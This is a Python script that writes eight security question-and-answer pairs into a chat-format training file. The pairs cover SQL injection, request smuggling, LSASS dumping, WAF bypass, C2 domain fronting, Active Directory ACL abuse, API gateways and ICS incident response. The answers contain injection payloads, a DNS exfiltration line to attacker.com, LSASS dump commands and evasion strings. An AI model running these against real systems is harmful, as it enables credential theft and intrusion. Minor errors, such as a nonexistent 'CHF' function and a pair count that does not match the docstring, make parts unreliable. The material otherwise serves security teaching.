#!/usr/bin/env python3
"""gen_f_fill35.py -- 30 more pairs to reach 1002 total"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

p("What is SQL injection time-based blind exploitation?",
  "Time-based blind SQL injection: no data visible in response; infer data from response time; if payload causes delay = condition true. When to use: error-based: database errors reveal data; union-based: inject SELECT returns data in response; Boolean-blind: true condition changes response body; time-based blind: none of above available; completely blind; only observable difference is response time. How it works: inject time-delay function with conditional: MySQL: ' AND SLEEP(5) -- (unconditional: always delays 5 seconds); conditional: ' AND IF(1=1, SLEEP(5), 0) -- (if 1=1 is true: sleep 5 seconds; else: return immediately); ' AND IF(SUBSTRING(user(),1,1)='r', SLEEP(5), 0) -- (if first char of user() is r: sleep 5s); measure response time; if sleep occurs: condition true; binary search: extract data character by character: is ASCII value of first char of database() > 100? (5 second delay = yes); is it > 75? (no delay = no); etc. Database-specific syntax: MySQL: SLEEP(5); PostgreSQL: pg_sleep(5); SELECT CASE WHEN (condition) THEN pg_sleep(5) ELSE 0 END; MSSQL: WAITFOR DELAY 0:0:5; IF(condition) WAITFOR DELAY 0:0:5; Oracle: dbms_pipe.receive_message(chr(1),5); BEGIN IF condition THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(1),5); END IF; END; SQLite: usually no time delay; use Boolean blind instead. sqlmap automation: sqlmap -u http://target.com/page?id=1 --technique=T (time-based only); sqlmap -u http://target.com/page?id=1 --dbms=mysql --dump; --time-sec=10 (set timeout threshold); sqlmap handles payload construction and binary search automatically. Manual extraction: burp intruder: payload: ' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>PLACEHOLDER, SLEEP(5), 0) --; placeholder: 0, 32, 64, 96, 112, 120, 124 (binary search); record response time per payload; > 5 second response = condition true. OOB (Out-of-Band) alternative: if intranet and DNS allowed: LOAD_FILE or SELECT into outfile via DNS; MySQL: SELECT LOAD_FILE(CONCAT(\\\\, SELECT database(), .attacker.com\\test)); DNS query encodes data; faster than time-based; requires network egress for DNS. Mitigation: parameterised queries (same as all SQL injection); least privilege database user: if no write access, no SLEEP function access (some databases restrict timer functions by privilege).")

p("What is HTTP request smuggling?",
  "HTTP request smuggling: exploit discrepancy in how front-end and back-end servers parse HTTP requests; inject partial request targeting another user; cache poisoning, WAF bypass, request hijacking. How it works: HTTP/1.1: two headers specify body length: Content-Length (CL): exact byte count; Transfer-Encoding: chunked (TE): body in chunks; terminated by zero-length chunk (0\\r\\n\\r\\n); front-end (load balancer, proxy) and back-end may disagree on which header takes precedence; attacker crafts request exploiting disagreement. Attack types: CL.TE: front-end uses Content-Length; back-end uses Transfer-Encoding; attacker sends: POST / HTTP/1.1\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin; front-end: Content-Length 13; forwards exactly 13 bytes; back-end: reads chunked body (chunk 0 = end); leftover bytes (GET /admin) prepended to next request; next user request now starts with GET /admin; TE.CL: front-end uses Transfer-Encoding; back-end uses Content-Length; send chunked body; front-end sees valid chunked; back-end sees shorter Content-Length; leftover in buffer; TE.TE: both support TE; but one can be confused by obfuscated TE header: Transfer-Encoding: xchunked or Transfer-Encoding: chunked with whitespace. Impact: bypass security controls: WAF on front-end does not see malicious request because it is hidden in smuggled bytes; back-end sees complete malicious request; request hijacking: victim next request intercepted; attacker sees their headers (cookies, tokens); cache poisoning: smuggled request poisons cache; all users see poisoned response; bypass access controls: append /admin to victim request; back-end processes as if victim requested /admin. Detection and exploitation: Burp Suite: HTTP Request Smuggler extension; automated detection; differential response timing: send CL.TE probe; observe timing difference; Turbo Intruder (Burp): send requests with precise timing. Prevention: HTTP/2: end-to-end; eliminates most smuggling (H2 does not use CL/TE ambiguity); upgrade to HTTP/2 between front-end and back-end; normalise requests: front-end normalises all requests before forwarding; remove or rewrite ambiguous headers; disable Transfer-Encoding chunked if not needed; ensure front-end and back-end agree: same server software or explicit configuration; reject ambiguous requests: if both CL and TE present: reject with 400 Bad Request; most modern servers do this by default.")

p("What is API gateway security?",
  "API gateway security: API gateway as security control point for all API traffic; enforce authentication, rate limiting, and monitoring at the edge. API gateway functions (security perspective): authentication: validate API key, JWT, OAuth token before request reaches backend; reject invalid credentials at gateway; authorisation: coarse-grained: does this client have access to this endpoint at all?; fine-grained: handled at service level; rate limiting: limit requests per API key or IP; protect backend from abuse; request validation: validate request schema (JSON schema, OpenAPI spec); reject malformed requests; SSL termination: decrypt HTTPS; inspect plaintext; re-encrypt to backend (or internal cleartext if trusted network); WAF integration: some gateways include WAF; filter OWASP Top 10 attacks; logging: all requests logged; API analytics; abuse detection; transformation: modify requests/responses; strip internal headers; add auth headers; product examples: AWS API Gateway + WAF; Kong Gateway (open-source + enterprise); Apigee (Google Cloud); Azure API Management; Nginx API Gateway; Traefik; MuleSoft. JWT validation at gateway: gateway validates JWT signature; checks expiry (exp), issuer (iss), audience (aud); rejects invalid tokens before backend sees request; backend can trust token has been validated; performance: validation at gateway; backend does not re-validate; API key management: issue API keys to clients; associate key with: rate limit, allowed endpoints, quota; rotate keys without changing client code; revoke compromised keys immediately; key analytics: which clients make most requests; abnormal usage patterns. Common gateway vulnerabilities: authentication bypass: if endpoint not protected at gateway but accessible directly (internal path bypasses gateway); test: direct backend access; parameter pollution: gateway validates parameter; backend sees different parameter value (different parsing); injection via gateway headers: X-Forwarded-For injection if gateway trusts client-provided headers; ensure gateway sets X-Forwarded-For, X-Real-IP from actual connection; gateway misconfiguration: path traversal in route matching; wildcard routes too permissive; defence in depth: gateway + service-level auth: even with gateway auth, individual services should validate tokens; if gateway misconfigured or bypassed: service auth is last line of defence.")

p("What is Windows credential access via LSASS?",
  "LSASS (Local Security Authority Subsystem Service): Windows process storing credential material; primary target for credential theft. What LSASS stores: NTLM hashes: for currently or recently logged-in users; Kerberos tickets: TGTs and service tickets; cleartext passwords: WDigest authentication (legacy); DES/RC4 encrypted passwords; credential cache: domain credentials for offline authentication; LM hashes (very legacy); tools to access: Mimikatz (most famous): sekurlsa::logonpasswords (dump all credential material from LSASS); requires: local administrator + SeDebugPrivilege; mechanism: OpenProcess on LSASS (PID); ReadProcessMemory; parse credential structures; output: usernames, domains, NTLM hashes, cleartext passwords if WDigest enabled; Procdump (Sysinternals): dump LSASS memory to file: procdump.exe -ma lsass.exe lsass.dmp; copy dump off-target; parse offline with Mimikatz: sekurlsa::minidump lsass.dmp; sekurlsa::logonpasswords; avoid real-time Mimikatz detection by dumping and parsing offline; alternative dump methods: Task Manager: Create Dump File on LSASS (admin); comsvcs.dll: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump LSASS_PID lsass.dmp full; Out-Minidump.ps1 (PowerSploit): PowerShell-based dump; SQLDumper.exe: Microsoft binary dumping LSASS; RPC-based dump: Windows APIs to dump via RPC (bypasses some EDR hooks). Defences: Credential Guard: isolates LSASS in Virtualization Based Security (VBS); LSA Isolated: LSASS secrets in VSM (Virtual Secure Mode); Mimikatz cannot read VBS-protected secrets; highly effective; requires UEFI + VT-d/AMD-Vi; Disable WDigest: prevent cleartext password caching: HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest UseLogonCredential = 0; Protected Process Light (PPL): LSASS runs as PPL; blocks most dump methods; Mimikatz PPL bypass exists but detectable; Windows Credential Guard: must be enabled via Group Policy; modern Windows (Windows 10 1703+, Server 2016+); EDR detection: Sysmon Event 10: LSASS process access; alert on: OpenProcess to LSASS with PROCESS_VM_READ; Sysmon Event 1: procdump.exe or comsvcs.dll with lsass in command; EDR: LSASS memory access detection; Defender for Identity: detects Mimikatz over the network (remote LSASS dump via network); Sysmon config: TargetImage contains lsass.exe and GrantedAccess = 0x1010 (VM read + query limited); alert immediately.")

p("What is web application firewall (WAF) bypass?",
  "WAF bypass: circumvent web application firewall detection to deliver attack payload; test WAF effectiveness or bypass in penetration testing. Why bypasses work: WAF uses pattern matching and signatures; attackers craft payloads that match attack intent but not WAF signature; encoding, obfuscation, and alternative syntax achieve same attack with different bytes. Common bypass techniques: encoding: URL encoding: %3Cscript%3E bypasses filter for <script>; double URL encoding: %253Cscript%253E (server decodes twice); HTML entities: &#x3C;script&#x3E; (HTML entity for <script>); Unicode: \\u003cscript\\u003e; base64 + eval (if WAF does not decode base64); case variation: <ScRiPt>alert(1)</sCrIpT> (if WAF case-sensitive); whitespace: SQL: SELECT/**/1/**/FROM/**/users; tab instead of space: SELECT\tFROM; newline: SELECT\nFROM; comment injection: SQL: SE/**/LECT (MySQL inline comment splits keyword); /*!50000 UNION*/ (MySQL version-specific comment executes); SQLite: no comments; alternative syntax: SQL OR: || in ANSI SQL; MSSQL: EXEC xp_cmdshell vs EXEC(xp_cmdshell); MySQL CONCAT vs CONCAT_WS; function alternatives: CHAR(65) = A; CHF(32+33) = A; chunked transfer encoding: send payload in chunked HTTP body; some WAFs parse fully assembled body but might miss chunked; HTTP parameter pollution: supply same parameter twice: ?id=1&id=2 UNION SELECT; WAF inspects first instance; backend processes second; HTTP method override: POST with X-HTTP-Method-Override: GET; WAF inspects POST; backend treats as GET. WAF specific bypasses: Cloudflare WAF bypass: test with: fuzzing for working payloads; known bypass lists; wafninja (WAF bypass tool); ModSecurity CRS bypass: paranoia level 1 (default) has known bypasses; paranoia level 3/4 much harder; SSRF bypass: attacker.com@internal-host (most WAF check @-split); http://127.1 instead of 127.0.0.1; http://0 (0.0.0.0 equivalent on some systems); decimal IP: http://2130706433 (127.0.0.1 in decimal). Testing: manual: Burp Suite Intruder with encoding; automated: sqlmap with tamper scripts (--tamper=space2comment, charencode, randomcase); wafw00f (WAF fingerprinting); ghauri (SQLi WAF bypass tool); nikto with evasion options; GraphQL: different syntax may bypass WAF; Prevention (defender side): WAF in blocking mode with high paranoia; layer with RASP (runtime, context-aware); application-level input validation (not just WAF); WAF is not last line of defence; defence in depth.")

p("What is domain fronting in C2 infrastructure?",
  "Domain fronting: route C2 traffic through CDN infrastructure of major provider; CDN forwards to attacker server; block requires blocking entire CDN. How domain fronting works: CDN (Cloudflare, AWS CloudFront, Azure CDN): large CDN; hosts many domains; traffic to CDN from network looks like: HTTPS to legitimate-sounding domain; TLS SNI (Server Name Indication): domain in TLS handshake (visible to network monitoring even in HTTPS); HTTP Host header: actual destination inside encrypted HTTPS; CDN routes based on Host header not SNI; domain fronting: TLS SNI: legitimate domain (allowed.example.com) on CDN; HTTP Host header (inside encrypted TLS): attacker C2 backend (c2.attacker.com, also on same CDN); CDN sees SNI: allowed.example.com (allowed by firewall); CDN routes based on Host: c2.attacker.com; forwards to attacker infrastructure; network observer: sees connection to allowed.example.com over port 443; does not see Host header (inside TLS). Why effective: firewall allows legitimate CDN (cloudfront.net, cloudflare.com, azureedge.net); blocking CDN would break legitimate business; no malware signature in traffic (legitimate HTTPS to CDN); encrypted content. Current status: major CDN providers cracked down: AWS CloudFront (2018): disabled domain fronting; Google Cloud CDN: disabled; Cloudflare: limited (enterprise plans); Azure: blocked standard domain fronting; detection: CDN provider enforcement: CDN validates SNI matches Host; rejects mismatched requests; still possible on some smaller CDN providers or misconfigured CDN setups; alternatives: domain fronting-like techniques using CDN worker or function: Cloudflare Workers can proxy; harder to detect but requires CDN account; residential proxy networks; bulletproof hosting with legitimate-looking domains; categorised domains. Detection: network monitoring: if CDN validates SNI matches Host: effectively blocked; TLS fingerprint (JA3): detect C2 client by TLS fingerprint regardless of routing; DNS: CDN resolution points; if CDN validates: no fronting possible; for defenders: CDN inspection (SSL inspection with proper certificate validation) would catch: SNI vs Host mismatch; most enterprise SSL inspection does this; network sandboxes check C2 behaviour even over HTTPS.")

p("What is active directory privilege escalation via ACL abuse?",
  "Active Directory ACL abuse: exploit misconfigured access control lists on AD objects; grant self elevated permissions; escalate to domain admin. AD ACLs: every AD object has DACL (Discretionary Access Control List); defines who has what permissions on the object; permissions include: GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, AllExtendedRights; misconfigured ACL: regular user has powerful permission on sensitive AD object; abuse for privilege escalation. Specific permissions exploitable: GenericAll on user: attacker can: reset password, modify group membership, disable account, add to any group; GenericAll on group: add any user to group; add self to Domain Admins; WriteDACL: write new ACE to DACL; grant self GenericAll; then exploit GenericAll; WriteOwner: change object owner; become owner; owner has implicit full control; ForceChangePassword: reset target user password without knowing current password; over-the-wire reset; AddMember on group: add self or any user to group; direct group membership; User-Force-Change-Password extended right: same as ForceChangePassword; GenericWrite: write specific attributes; most interesting: scriptPath (logon script) = code execution on user next logon, servicePrincipalName = add SPN; make Kerberoastable. Enumeration: BloodHound + SharpHound: collect AD data; BloodHound UI: find shortest path to Domain Admins; highlight ACL-based attack paths; PowerView: Get-DomainObjectAcl -DistinguishedName DC=corp,DC=com -ResolveGUIDs; identify non-default permissions; filter for interesting principals (not Administrators, Domain Admins): Get-DomainObjectAcl | Where-Object {$_.SecurityIdentifier -match REGULAR_USER_SID}. Exploitation: PowerView: Set-DomainObjectOwner (WriteOwner abuse); Add-DomainObjectAcl (add ACE); Set-DomainUserPassword (ForceChangePassword); Add-DomainGroupMember (AddMember); Impacket: dacledit.py (Python-based ACL modification); owneredit.py; scenario: regular user has GenericAll on Service Account with SPN; add self-controlled SPN; Kerberoast service account; crack password; service account has local admin on servers; lateral movement. Prevention: quarterly ACL auditing: review all non-default ACLs on privileged objects; BloodHound: run internally; find and remove unexpected ACEs; AdminSDHolder: protects high-privileged group members; propagated every 60 minutes; remove unexpected ACEs from AdminSDHolder; Protected Users group: additional protections; monitoring: Event 5136 (directory service object modified); alert on: ACL changes on sensitive objects (Domain Admins group, AdminSDHolder, user accounts), especially when source is non-admin account.")

p("What is industrial control system (ICS) security incident response?",
  "ICS incident response: respond to cyberattacks on operational technology; safety is paramount; different from IT IR. Why ICS IR differs: safety first: incorrect response can cause physical harm (explosion, release of hazardous material, injury); production impact: every ICS response action has business and safety consequence; specialized knowledge: OT protocols (Modbus, DNP3, Profibus), engineer expertise required; limited patching: cannot patch or restart ICS systems without plant engineer approval and planned outage; legacy systems: no EDR, no modern logging, no encryption; air-gap assumption: many ICS teams assume air-gap protects them; not always true. ICS IR phases: detect: OT-specific detection: passive network monitoring (Nozomi, Claroty, Dragos), historian anomalies, operator observations (HMI displaying wrong values, PLC behaving unexpectedly), safety system alarms, IT-side indicators suggesting lateral movement toward OT network; contain: decision: continue production with accepted risk vs emergency shutdown vs controlled shutdown; never automatically isolate OT systems (may cause worse physical consequence); consult plant engineer; safety engineer; operations manager; emergency procedures: if immediate safety risk: activate emergency shutdown procedures (process-specific); in-band vs out-of-band: use out-of-band network for IR comms (not the compromised OT network); eradicate: after safe shutdown: remove malware; restore clean configurations from backup; verify hardware integrity; recover: restore from known-good backups; verify PLC ladder logic integrity (compare to last known good); staged startup: bring systems up sequentially; verify each stage before proceeding; test safety systems before resuming production. Preparation: ICS IR plan: separate from IT IR plan; specific playbooks for scenarios (ransomware on historian, PLC manipulation, HMI compromise); OT-specific IR tools: USB-based forensic tools (cannot install agents on PLCs); Portable network capture hardware (tap); reference configurations: offline backup of all PLC programs, HMI configurations, historian schemas; exercises: OT-specific tabletop; scenario: adversary modifies PLC setpoints; notification tree: who to call in OT incident (plant manager, safety manager, equipment vendor, ICS-CERT, FBI); safety system isolation: know how to isolate control system safety functions from digital control while maintaining physical safety. Standards: ICS-CERT (CISA): incident reporting and support; IEC 62443-2-1: security management system for IACS; NIST SP 800-82: ICS security guide including IR guidance; ISA-99: security programme elements; Dragos Year in Review: ICS threat landscape and IR case studies.")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f TARGET MET -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
